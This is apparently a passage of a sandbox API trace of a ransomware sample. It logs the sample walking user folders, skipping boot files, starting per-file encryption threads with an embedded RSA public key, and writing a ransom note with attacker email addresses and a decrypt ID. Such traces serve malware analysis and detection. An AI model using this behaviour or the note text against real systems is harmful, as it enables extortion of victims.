ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0047.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0047.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x578 [0047.553] WriteFile (in: hFile=0x578, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0047.554] CloseHandle (hObject=0x578) returned 1 [0047.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3e27d78 [0047.554] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="MSN Websites" [0047.554] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0047.554] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.554] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.554] FindNextFileW (in: hFindFile=0x3e27d78, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0047.554] FindClose (in: hFindFile=0x3e27d78 | out: hFindFile=0x3e27d78) returned 1 [0047.555] FindClose (in: hFindFile=0x3e27d78 | out: hFindFile=0x3e27d78) returned 0 [0047.555] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0047.555] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0047.555] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0047.555] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0047.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0047.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0047.555] SetErrorMode (uMode=0x1) returned 0x1 [0047.555] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0047.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0047.555] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0047.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0047.555] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3e27df8 [0047.610] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="Windows Live" [0047.610] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0047.610] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.610] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.610] lstrcmpW (lpString1="Get Windows Live.url", lpString2="..") returned 1 [0047.610] lstrcmpW (lpString1="Get Windows Live.url", lpString2=".") returned 1 [0047.610] StrStrW (lpFirst="Get Windows Live.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0047.610] StrStrW (lpFirst="Get Windows Live.url", lpSrch="ntldr") returned 0x0 [0047.610] StrStrW (lpFirst="Get Windows Live.url", lpSrch="NTLDR") returned 0x0 [0047.610] StrStrW (lpFirst="Get Windows Live.url", lpSrch="NTDETECT.COM") returned 0x0 [0047.610] StrStrW (lpFirst="Get Windows Live.url", lpSrch="ntdetect.com") returned 0x0 [0047.610] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0047.610] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0047.610] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0047.610] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0047.611] lstrcpyW (in: lpString1=0x17be7c, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0047.611] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0047.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x594 [0047.611] Sleep (dwMilliseconds=0x96) [0047.826] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0047.826] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="..") returned 1 [0047.826] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2=".") returned 1 [0047.826] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0047.826] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="ntldr") returned 0x0 [0047.826] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="NTLDR") returned 0x0 [0047.826] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="NTDETECT.COM") returned 0x0 [0047.826] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="ntdetect.com") returned 0x0 [0047.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0047.826] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0047.826] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0047.826] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0047.826] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0047.826] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0047.826] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x598 [0047.827] Sleep (dwMilliseconds=0x96) [0048.010] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0048.011] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="..") returned 1 [0048.011] lstrcmpW (lpString1="Windows Live Mail.url", lpString2=".") returned 1 [0048.011] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0048.011] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="ntldr") returned 0x0 [0048.011] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="NTLDR") returned 0x0 [0048.011] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="NTDETECT.COM") returned 0x0 [0048.011] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="ntdetect.com") returned 0x0 [0048.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0048.011] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0048.011] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0048.011] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.011] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0048.011] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0048.011] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x59c [0048.011] Sleep (dwMilliseconds=0x96) [0048.216] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0048.216] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="..") returned 1 [0048.217] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2=".") returned 1 [0048.217] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0048.217] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="ntldr") returned 0x0 [0048.217] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="NTLDR") returned 0x0 [0048.217] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="NTDETECT.COM") returned 0x0 [0048.217] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="ntdetect.com") returned 0x0 [0048.217] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0048.217] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0048.217] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0048.217] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.217] lstrcpyW (in: lpString1=0x17be7c, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0048.217] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0048.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a0 [0048.217] Sleep (dwMilliseconds=0x96) [0048.602] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0048.602] FindClose (in: hFindFile=0x3e27df8 | out: hFindFile=0x3e27df8) returned 1 [0048.603] FindClose (in: hFindFile=0x3e27df8 | out: hFindFile=0x3e27df8) returned 0 [0048.603] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0048.603] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0048.603] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0048.603] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0048.603] SetErrorMode (uMode=0x1) returned 0x1 [0048.603] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT") returned 74 [0048.603] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0048.603] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0048.603] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x5a4) returned 0x0 [0048.604] RegQueryValueExW (in: hKey=0x5a4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de40f8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3de40f8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0048.604] RegCloseKey (hKey=0x5a4) returned 0x0 [0048.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0048.604] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0048.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4 [0048.604] WriteFile (in: hFile=0x5a4, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0048.605] CloseHandle (hObject=0x5a4) returned 1 [0048.605] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3e27df8 [0048.605] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="Windows Live" [0048.605] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0048.605] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.605] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.606] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0048.606] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.606] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0048.606] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0048.606] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0048.606] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0048.606] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0048.606] FindNextFileW (in: hFindFile=0x3e27df8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0048.606] FindClose (in: hFindFile=0x3e27df8 | out: hFindFile=0x3e27df8) returned 1 [0048.606] FindClose (in: hFindFile=0x3e27df8 | out: hFindFile=0x3e27df8) returned 0 [0048.606] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0048.606] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0048.606] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0048.606] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0048.606] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0048.606] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0048.606] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0048.606] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0048.606] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: 